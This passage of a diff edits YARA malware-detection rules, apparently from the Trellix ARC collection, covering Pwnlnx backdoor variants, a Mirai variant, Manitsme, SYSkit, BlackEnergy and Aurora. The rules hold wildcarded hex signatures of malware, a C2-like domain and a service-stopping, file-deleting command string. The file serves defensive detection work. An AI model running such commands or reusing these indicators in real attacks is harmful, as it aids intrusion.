?5B415C415D415E415FC9C30F1F????554889??4157415641554154534883????E8????????65??8B????????????4889????4889????4189??8B??????????4889??B9????????48C7??????????4889??4D89??4589??89??C1????C1????01??25????????29??F3A648984C8B????????????0F84????????B9????????48C7??????????4889??F3A60F84????????31??4585??4889??4889????4489????74??418D??????31??488D??????0FB6??4883????4889??48C1????48C1????4801??4801??4839??488D????488D????75??89????488D????4C89??E8????????4885??4889??0F84????????488B????4885??74??81????????????0F84????????488B??????????483D????????4C8D????75??EB??0F1F??????498B????483D????????4C8D????74??498B??4889??E8????????85??75??31??4883????5B415C415D415E415FC9C34589??4D89??488B????4489??4889??488B????FF??????????4883????5B415C415D415E415FC9C30F1F??????????81????????????0F85????????31??EB??488D????4C89??E8????????4885??4889??74??498B????488B??????????488B????4885??74??31??4889??4889????FF??4885??488B????0F84????????31??E9????????0F1F????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??41554154534883????E8????????4C8B??????????4989??4981??????????498D??????75??EB??0F1F????4C8B????4981??????????498D??????74??488B??4C89??E8????????85??75??4C89??E8????????488B??E8????????4889??E8????????4883????5B415C415DC9C36666662E????????????????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889?? } - - condition: - uint16(0)==0x457f and filesize <400KB and all of them -} -import "pe" - -rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_6 : BACKDOOR FILE -{ - meta: - description = "Rule to detect the backdoor pwnlnx variant 6" - author = "Marc Rivero | McAfee ATR Team" - id = "56bfe9c7-4cd4-51f6-a469-da8af52d64c2" - date = "2020-04-17" - modified = "2020-08-14" - reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_decade_of_RATs.yar#L131-L161" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "d29254ab907c9ef54349de3ec0dd8b22b4692c58ed7a7b340afbc6e44363f96a" - logic_hash = "29423135a46ee7b9aa1bd8f1e6f7ffad09725787ad6e75312e1d34b18e3917d4" - score = 75 - quality = 70 - tags = "BACKDOOR, FILE" - rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Pwnlnx" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $bp = { 7F??4C4602??01??000000000000000001??3E????000000000000000000000000000000000000??????09??00000000000000004000000000??????2B??28??04??000014??000003??0000474E55????4D9585????AB6522????52AD3B??EC9B4BE8????????0000000000000000????00000000554889??????????4889??41544989??534889??488B??????????E8????????4C89??4889??48C7??????????FF??????????488B??????????89??E8????????89??5B415C5DC30F1F??E8????????554889??????????4889??41544989??534889??488B??????????E8????????4C89??4889??48C7??????????FF??????????488B??????????89??E8????????89??5B415C5DC30F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??41574589??415641554189??4154534889??4883????488B??????????4889????4889????4C89????483D????????4C8D????74??4C63??EB??0F1F??????498B????483D????????4C8D????74??498B??4C89??4889??E8????????85??75??4883????5B415C415D415E415F5DC30F1F??????????4589??4C8B????488B????4489??4889??488B????FF??????????4883????5B415C415D415E415F5DC3660F1F??????E8????????554889??41574589??41564D89??41554989??41544189??BA????????534889??488D????4883????4889????4889??65??8B????????????4889????31??E8????????488B??????????4881??????????488D????74??0FB7????4839??75??EB??0F1F????????????410FB7????4839??74??4C8B????4981??????????498D????75??4589??4D89??4C89??4489??4889??488B????FF??????????488B????65??33????????????75??4883????5B415C415D415E415F5DC3660F1F??????31??EB??E8????????0F1F??????662E0F1F????????????E8????????55BF????????4889??4881??????????65??8B????????????4889????31??488D??????????FF????????????B9????????4889??488D??????????F3??A5488D??????????48C7??????????BE????????B1??E8????????4885??74??48BA???????? } - - condition: - uint16(0)==0x457f and filesize <700KB and all of them -} -import "pe" - -rule TRELLIX_ARC_Mirai_Casper_Variant : BACKDOOR FILE -{ - meta: - description = "Rule to detect the Mirai Casper variant" - author = "Marc Rivero | McAfee ATR Team" - id = "0f3a028c-9514-51cd-ad82-415e8ac2dee7" - date = "2020-04-17" - modified = "2020-08-14" - reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_decade_of_RATs.yar#L163-L193" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "57cc422a6a90c571198a2d1c3db13c31fbdb48ba2f0f4356846d6d636d0f9300" - logic_hash = "5449d1ef0c4977c6151fc194ad5f526b6be414c1efb7fd4bacb77d4bcd89c703" - score = 75 - quality = 70 - tags = "BACKDOOR, FILE" - rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Pwnlnx" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $bp = { 7F??4C4601??01??000000000000000002??03??01??0000E0??04??34??000088??????????000034??20??05????????????????000000000000000080??????80??????15????????0C??05????????10??????0000??????0C??40A510??40A510??80??????904A0000060000000010????????0000D4??0000D4??04??D4??04??440000??????????????000004??0000070000??????0C??40A510??40A510??14??000030??000004??000004??000051E5??64????000000000000000000000000000000000000060000??????000004??000010??000001??0000474E5500000000????0000????0000????0000??????000014??000003??0000474E55??????3A??87????529723????2C??08??????AB35????????2A??0000BC????????0000????A510??2A??0000C4??????????0000C8??????2A??0000CCA510??2A??00005589??5383????E8????????5B81??????????8B??????????85??74??E8????????E8????????E8????????585BC9C3FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????000000000000000031??5E89??83????50545268????????68????????515668????????E8????????F490909090909090909090909090905589??538D??????80????????????75??BB????????A1????????81??????????C1????83????39??73??908D??????83????A3????????FF????????????A1????????39??72??B8????????85??74??C7????????????E8????????C6????????????8D??????5B5DC3908D??????55B8????????89??8D??????E8????????5A81??????????85??74??89??????C7??????????????C7??????????????C7????????????E8????????A1????????85??74??B8????????85??74??C7????????????FF??C9C39090905589??83????8B????88????A1????????85??74??A1????????0FB6????88??83????A3????????EB??C7??????????????8D????89??????C7????????????E8????????C9C35589??83????EB??8B????0FB6??0FBE??83??????89????E8????????8B????0FB6??84??75??C9C35589??83????8B????0FB6??88????83??????80??????0F84????????80??????74??0FBE????89????E8????????E9????????C7????????????8B????0FB6??88????83??????80??????75??C7????????????8B????0FB6??88????83??????EB??80??????75??C7????????????8B????0FB6??88????83??????C7????????????EB??8B????89??C1????01??01??89??0FBE????8D????83????89????8B????0FB6??88????83??????80??????7E??80??????7E??80??????74??80??????75??83??????8B????0FB6??88????83??????80??????0F84????????0FB6????88????80??????7E??0FB6????83????88????0FBE????83????83????0F87????????8B????????????FF??8B????8D????89????8B??89????C7????????????EB??83??????8B????8B????8D????0FB6??84??75??EB??C7????????????E8????????8B????83????85??75??8B????3B????0F92??83??????84??75??8B????89????E8????????EB??C7????????????E8????????8B????3B????0F92??83??????84??75??E9????????8B????8D????89????8B??0FBE??89????E8????????E9????????C7????????????EB??C7????????????EB??C7????????????EB??C7????????????EB??0FBE????89????E8????????E9????????8B????83????85??74??8B????8D????89????8B??EB??80??????75??8B????8D????89????8B??EB??8B????8D????89????8B??89????80??????75??8B????85??79??F7????83??????C7????????????8B????BA????????F7????89??88????8B????BA????????F7????89????80??????7E??80??????75??B8????????EB??B8????????0FB6????01??88????8B????0FB6????83????88??????83??????83??????74??83??????76??8B????83????85??74??8B????C6????????83??????8B????89????8B????83????84??74??B8????????EB??B8????????88????EB??0FBE????89????E8????????8B????83????85??75??8B????3B????0F92??83??????84??75??83??????8B????0FB6??????0FBE??89????E8????????83??????75??EB??C7????????????E8????????8B????3B????0F92??83??????84??75??E9????????E9????????90EB??90C9C35589??83????8D????89????8B????89??????8B????89????E8????????C9C35589??83????8B????8B????88????88????C9C35589??57565381??????????8B????8B????88??????????88??????????C7??????????????????C7??????????????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????66????????????8D??????????BA????????89??????C7??????????????89????E8????????83????????????0F84????????83????????????0F84????????8B??????????89????E8????????3D????????0F8F????????8B??????????89????E8????????83????0F8F????????8B??????????89????E8????????83????0F8F????????C7??????????????????EB??8B??????????03??????????0FB6??3C??7E??8B??????????03??????????0FB6??3C??7F??8B??????????03??????????8B??????????03??????????0FB6??83????88??8B??????????83????89??????????8B??????????89????E8????????8B??????????39??7F??81??????????????????7E??C7??????????????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????8B??????????C7??????????????89????E8????????89??????????C7??????????????????E9????????8B??????????69??????????03??????????C6??????8B??????????69??????????03??????????C7??????????8B??????????69??????????89??03??????????0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????8B????89????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????8B??????????69??????????03??????????0FB6??????????3C??74??8B??????????69??????????03??????????05????????89????E8????????8B??????????69??????????03??????????8D??????????8B??????????69??????????03??????????81??????????83????89??????89??????89????E8????????8B??????????69??????????03??????????C6????????????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????0FB6????3C??0F87????????8B??????????69??????????89??03??????????0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????8B????89????E8????????89??E8????????89??0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????0FB6????0FB6??89??89??D3??89??8D????89????E8????????89????E8????????89??BA????????89??F7??89??C1????89??C1????01??89??29??83????0F87????????8B????????????FF??C7????????????E8????????C7??????????????C7????????????E8????????8B??????????69??????????03??????????83????89??????89????E8????????C7????????????E8????????E9????????C7????????????E8????????C7??????????????C7????????????E8????????8B??????????69??????????03??????????83????89??????89????E8????????C7????????????E8????????E9????????C7????????????E8????????C7??????????????C7????????????E8????????8B??????????69??????????03??????????83????89??????89????E8????????C7???????????? } - - condition: - uint16(0)==0x457f and filesize <3000KB and all of them -} -import "pe" - -rule TRELLIX_ARC_APT_Stolen_Certificates : BACKDOOR FILE -{ - meta: - description = "Rule to detect samples digitally signed from these stolen certificates" - author = "Marc Rivero | McAfee ATR Team" - id = "57051977-780c-5c8e-bc66-0f1d8b3bbd93" - date = "2020-04-17" - modified = "2020-08-14" - reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_decade_of_RATs.yar#L196-L221" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "ce3424524fd1f482a0339a3f92e440532cff97c104769837fa6ae52869013558" - logic_hash = "9b700e4889349d0203bdd4e00035ee9c9aba5025ccc57eef915b2c78996f8160" - score = 75 - quality = 70 - tags = "BACKDOOR, FILE" - rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Pwnlnx" - actor_type = "Cybercrime" - actor_group = "Unknown" - - condition: - uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "/C=KR/ST=Seoul/L=Gangnam-gu/O=LivePlex Corp/CN=LivePlex Corp" and pe.signatures[i].serial=="3f:55:42:e2:e7:1d:8d:b3:57:04:1c:9d:d4:5b:95:0a" or pe.signatures[i].subject contains "/C=KR/ST=Seoul/L=Gangnam-gu/O=LivePlex Corp/CN=LivePlex Corp" and pe.signatures[i].serial=="3f:55:42:e2:e7:1d:8d:b3:57:04:1c:9d:d4:5b:95:0a" or pe.signatures[i].subject contains "/C=KR/ST=Seoul/L=Gangnam-gu/O=LivePlex Corp/CN=LivePlex Corp" or pe.signatures[i].serial=="3f:55:42:e2:e7:1d:8d:b3:57:04:1c:9d:d4:5b:95:0a") -} -rule TRELLIX_ARC_Apt_Manitsme_Trojan : TROJAN FILE -{ - meta: - description = "Rule to detect the Manitsme trojan" - author = "Marc Rivero | McAfee ATR Team" - id = "49e0c934-6920-5e49-837c-27ebbbd5a1a2" - date = "2013-03-08" - modified = "2020-08-14" - reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_manitsme_trojan_pdb.yar#L1-L36" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "c1c0ea096ec4d36c1312171de2a9ebe258c588528a20dbb06a7e3cf97bf1e197" - logic_hash = "584053145249a930d3eae5e291d3553c57fa427dbecac9f04e7c0169f153b7af" - score = 75 - quality = 70 - tags = "TROJAN, FILE" - rule_version = "v1" - malware_type = "trojan" - malware_family = "Trojan:W32/Manitsme" - actor_type = "Apt" - actor_group = "Unknown" - - strings: - $s1 = "SvcMain.dll" fullword ascii - $s2 = "rj.soft.misecure.com" fullword ascii - $s3 = "d:\\rouji\\SvcMain.pdb" fullword ascii - $s4 = "constructor or from DllMain." fullword ascii - $s5 = "Open File Error" fullword ascii - $s6 = "nRet == SOCKET_ERROR" fullword ascii - $s7 = "Oh,shit" fullword ascii - $s8 = "Paraing" fullword ascii - $s9 = "Hallelujah" fullword ascii - $s10 = "ComSpec" fullword ascii - $s11 = "ServiceMain" fullword ascii - $s12 = "SendTo(s,(char *)&sztop,sizeof(sztop),FILETYPE) == ERRTYPE" fullword ascii - - condition: - uint16(0)==0x5a4d and filesize <200KB and all of them -} -import "pe" - -rule TRELLIX_ARC_Syskit : FILE -{ - meta: - description = "SYSkit backdoor" - author = "Christiaan @ McAfee ATR" - id = "f06db38f-52d5-51b5-a17f-63e285dd5f80" - date = "2019-09-17" - modified = "2020-04-02" - reference = "https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_Tortoiseshell_Syskit.yar#L3-L40" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "5b489d47d56de5c770b6ff6d6d56bf0fb87174f4a8428052b28fb392d9ac3f87" - score = 75 - quality = 68 - tags = "FILE" - hash1 = "07d123364d8d04e3fe0bfa4e0e23ddc7050ef039602ecd72baed70e6553c3ae4" - hash2 = "f71732f997c53fa45eef5c988697eb4aa62c8655d8f0be3268636fc23addd193" - hash3 = "02a3296238a3d127a2e517f4949d31914c15d96726fb4902322c065153b364b2" - - strings: - $x1 = "timeout /t 10 & sc stop dllhost & timeout /t 10 & del C:\\Windows\\Temp\\BAK.exe" fullword wide - $s2 = "lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.R" ascii - $s3 = "C:\\Windows\\Temp\\rconfig.xml" fullword wide - $s4 = "Add-Type -AssemblyName System.IO.Compression.FileSystem" fullword wide - $s5 = "serviceProcessInstaller1" fullword ascii - $s6 = " [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)" fullword wide - $s7 = "exec_cmd2" fullword ascii - $s8 = "exec_cmd" fullword ascii - $s9 = "send_command_result" fullword ascii - $s10 = "mycontent" fullword ascii - $s11 = "Diagnostic Server Host" fullword wide - $s12 = "bytesToBeEncrypted" fullword ascii - $s13 = "createPostRequest" fullword ascii - $s14 = "myhash" fullword ascii - $s15 = "DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5" ascii - $s16 = "circle_time" fullword ascii - $s17 = "ServiceStart_AfterInstall" fullword ascii - $s18 = "serviceInstaller1" fullword ascii - $s19 = "BAK.ProjectInstaller.resources" fullword ascii - $s20 = "Dll host" fullword wide - $op0 = { 96 00 f1 0a 57 02 05 00 34 25 } - $op1 = { 96 00 83 05 5a 01 0e 00 38 28 } - $op2 = { 06 00 00 11 28 4d 00 00 0a 02 6f 4e 00 00 0a 28 } - - condition: - ( uint16(0)==0x5a4d and filesize <50KB and pe.imphash()=="f34d5f2d4577ed6d9ceec516c1f5a744" and (1 of ($x*) and 4 of them ) and all of ($op*)) or ( all of them ) -} -rule TRELLIX_ARC_Apt_Blackenergy_Pdb : TROJAN FILE -{ - meta: - description = "Rule to detect the BlackEnergy trojan" - author = "Marc Rivero | McAfee ATR Team" - id = "55c96b66-a8bf-5390-a75a-f3d2441c2a55" - date = "2013-02-15" - modified = "2020-08-14" - reference = "https://www.kaspersky.com.au/resource-center/threats/blackenergy" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_blackenergy_pdb.yar#L1-L38" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "4b2efcda5269f4b80dc417a2b01332185f2fafabd8ba7114fa0306baaab5a72d" - logic_hash = "7bb85d03d8f2a4d91554f7fea96e9bbe36b153cfa4a91fd13fb99d41d430c9e9" - score = 75 - quality = 70 - tags = "TROJAN, FILE" - rule_version = "v1" - malware_type = "trojan" - malware_family = "Trojan:W32/BlackEngergy" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $s1 = "msiexec.exe /i \"%s\" %s REBOOT=\"ReallySuppress\"" fullword wide - $s2 = "InstallUpdate: CreateProcess failed, Cmdline=%s Error=%d ." fullword wide - $s3 = "Portuguese=Instalando o Tempo de Execu" fullword wide - $s4 = "Initialization: Failed to initialize - Unable to get Upgrade Code." fullword wide - $s5 = "This version of Internet Explorer is not supported. You should upgrade Internet Explorer to version %s and run setup again. Se" wide - $s6 = "Initialization: Failed to open %s file, Make sure the file is not used by another process." fullword wide - $s7 = "o %s e execute a configura" fullword wide - $s8 = "Initialization: Failed to initialize - Unable to get Product Version." fullword wide - $s9 = "f:\\CB\\11X_Security\\Acrobat\\Installers\\BootStrapExe_Small\\Release\\Setup.pdb" fullword ascii - $s10 = "BootStrap.log" fullword wide - $s11 = "ACDownloaderDlg" fullword ascii - $s12 = "Initialization: Failed to initialize Product - msi key not specified." fullword wide - $s13 = "rio atualizar para o Service Pack %s e executar a instala" fullword wide - $s14 = "\\Msi.dll" fullword wide - - condition: - uint16(0)==0x5a4d and filesize <2000KB and all of them -} -rule TRELLIX_ARC_Apt_Aurora_Pdb_Samples : BACKDOOR FILE + +rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_2 : BACKDOOR FILE { meta: - description = "Aurora APT Malware 2006-2010" + description = "Rule to detect the backdoor pwnlnx variant 2" author = "Marc Rivero | McAfee ATR Team" - id = "51b080b7-671b-592b-ba52-7fdd0ddf0294" - date = "2010-01-11" + id = "c4ee686b-49d9-5566-b749-1144a19c1fee" + date = "2020-04-17" modified = "2020-08-14" - reference = "https://en.wikipedia.org/wiki/Operation_Aurora" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_operation_aurora.yar#L1-L26" + reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_decade_of_RATs.yar#L35-L65" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "ce7debbcf1ca3a390083fe5753f231e632017ca041dfa662ad56095a500f2364" - logic_hash = "5791ae7b96f2b59d0cca1ab97455bb4745edad8980ac4aff22aa36e0bc4f240e" + hash = "08cc67002782cbafd97a4bff549d25dd72d6976d2fdf79339aaf5a3ff7c3107e" + logic_hash = "08ea40ba72677263a41f62097fc38040361ba595d67cb04979b66548c7f4d271" score = 75 quality = 70 tags = "BACKDOOR, FILE" rule_version = "v1" malware_type = "backdoor" - malware_family = "Backdoor:W32/Aurora" + malware_family = "Backdoor:W32/Pwnlnx" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $pdb = "\\AuroraVNC\\VedioDriver\\Release\\VedioDriver.pdb" - $pdb1 = "\\Aurora_Src\\AuroraVNC\\Avc\\Release\\AVC.pdb" + $bp = { 7F??4C4602??01??000000000000000002??3E????0000000004??00000000??????00000000000088????????????00000000??????38??05????????????????0000????????????0000000000000000??????0000000000004000000000??????0D??????????????0D????????0000????00000000????0000????0000????????????0000????????????0000????????????0000????12??00000000????????????00000000????00000000??????000004??00005801??00000000??????4000000000??????4000000000????????00000000????????00000000??????000000000000070000??????000080??????0000000080??????0000000080??????0000000028??00000000000070??00000000000008??00000000000051E5??64??000000000000000000000000000000000000000000000000000000000000000000000000000000000000????000000000000??????000010??000001??0000474E5500000000????0000????0000????0000??????000014??000003??0000474E55????????????CC78??78??83????????????CB371F0000000080??????0000000025????????0000????7E??00000000????????????0000????????????0000??????4200000000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000??????4200000000????????????0000????????????0000??????4200000000????????????0000????????????0000????????????0000????76??00000000????????????0000????8B????00000000C8??????0000000025????????0000??????4200000000????76??00000000????????????0000????444200000000????76??00000000????????????0000??????4900000000????76??00000000????????????0000??????4600000000????76??00000000????????????0000????424200000000??????EC08??33??0000E8????????E8????????4883????C3FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????00000000000000000000000000000000000000000000000031??4989??5E4889??4883????505449C7??????????48C7??????????48C7??????????E8????????F490904883????488B??????????4885??74??FF??4883????C390909090909090909090909090554889??534883????80????????????75??BB????????488B??????????4881??????????48C1????4883????4839??73??660F1F??????4883????4889??????????FF????????????488B??????????4839??72??B8????????4885??74??BF????????E8????????C6????????????4883????5BC9C30F1F????????????55B8????????4885??4889??74??BE????????BF????????E8????????4883????????????74??B8????????4885??74??BF????????C9FF??0F1F??????????C9C39090554889??534881??????????89??????????48C7????????????8B????3D????????0F87????????8B????89??488D??????????8B??????????4889??89??E8????????85??0F84????????8B????89??488D??????????89??4889??E8????????BA????????488D??????????4889??4889??E8????????4889????4883??????0F84????????488D??????????488D??????????4889??4889??E8????????85??0F85????????488B??????????4889????C7????????????488B????89????488B????48C1????89????488B????4889????488B????4889??????488B????4889??????E8????????89????BE????????488D????E8????????488D????8B??????????BA????????4889??89??E8????????85??0F84????????488D????8B??????????BA????????4889??89??E8????????85??0F84????????BE????????488D????E8????????8B????488B????4889????488B????4889??????488B????4889??????E8????????39??0F85????????8B????89??4889??48C1????8B????89??488D????4889????488B????488B????BA????????4889??4889??E8????????488B????4889????EB??488B????488D??????????4889??BA????????BE????????4889??E8????????89????83??????7E??8B????488D??????????89??4889??E8????????8B????4863??488D??????????8B??????????4889??89??E8????????85??74??8B????48984801????488B????483B????7C??EB??90EB??90EB??90EB??90EB??90EB??90488B????4889??E8????????EB??90EB??90EB??90B8????????4881??????????5BC9C3554889??534881??????????4889??????????E8????????4889??E8????????C7????????????488B??????????8B????89????488B??????????8B??89????488B??????????8B????89????8B????8B????BA????????89??89??E8????????89????83??????0F84????????488D????BA????????BE????????4889??E8????????C7????????????C7????????????8B????89????488B????4889????488B????4889??????488B????4889??????E8????????89????488D????BE????????4889??E8????????488D????8B????BA????????4889??89??E8????????85??0F84????????488D??????????4889??E8????????488D??????????BE????????4889??E8????????488D??????????8B????BA????????4889??89??E8????????85??0F84????????488D????8B????BA????????4889??89??E8????????85??74??488D????BE????????4889??E8????????8B????488B????4889????488B????4889??????488B????4889??????E8????????39??75??8B????83????75??8B????488B????4889????488B????4889??????488B????4889??????89??E8????????EB??90EB??90EB??90EB??90EB??908B????89??E8????????B8????????4881??????????5BC9C390554889??4889????89????C7????????????488B????4889????C7????????????EB??488B????0FB6??8B????89??C1????F7????89??48980FB6??????????89??31??488B????88??83??????4883??????8B????3B????7C??488B????C9C3554889??4889????89????488B????4889????C7????????????EB??488B????0FB6??0FB6??????????31??488B????88??83??????4883??????8B????3B????7C??488B????C9C39090554889??534881??????????89??????????48C7????????????48C7????????????48C7????????????8B????89??488D??????????8B??????????4889??89??E8????????85??0F84????????8B????89??488D??????????89??4889??E8????????488D??????????488D??????????4889??4889??E8????????BA????????488D??????????488D??????????BE????????4889??B8????????E8????????488D??????????4889??E8????????4883????4889??E8????????4889????4883??????0F84????????488D??????????488B????4889??4889??E8????????488D??????????488D????B9????????BA????????4889??4889??E8????????89????83??????0F8E????????C7????????????E9????????488B????8B????4863??48C1????4801??488B??488D????BA????????488D??????????488D??????????4989??BE????????4889??B8????????E8????????488D??????????488D??????????4889??4889??E8????????85??0F85????????48C7????????????48C7????????????488D??????????4883????4889??E8????????4889??E8????????488B??????????8B??????????4189??4181??????????8B??????????89??81??????????488B????8B????4863??48C1????4801??488B??488D????BA????????488D??????????4889??????4889??????488B????4889??????488B????4889????4589??4189??4889??BE????????4889?? } condition: - uint16(0)==0x5a4d and filesize <150KB and any of them + uint16(0)==0x457f and filesize <1000KB and all of them } -rule TRELLIX_ARC_Apt_Elise_Pdb : BACKDOOR FILE +import "pe" + +rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_3 : BACKDOOR FILE { meta: - description = "Rule to detect Elise APT based on the PDB reference" + description = "Rule to detect the backdoor pwnlnx variant" author = "Marc Rivero | McAfee ATR Team" - id = "cc8dd203-baad-5800-ba2c-f9c47d8ca6f0" - date = "2017-05-31" + id = "02ea1eb2-7235-5ed5-86ba-19d52e8fb428" + date = "2020-04-17" modified = "2020-08-14" - reference = "https://attack.mitre.org/software/S0081/" - source_url = 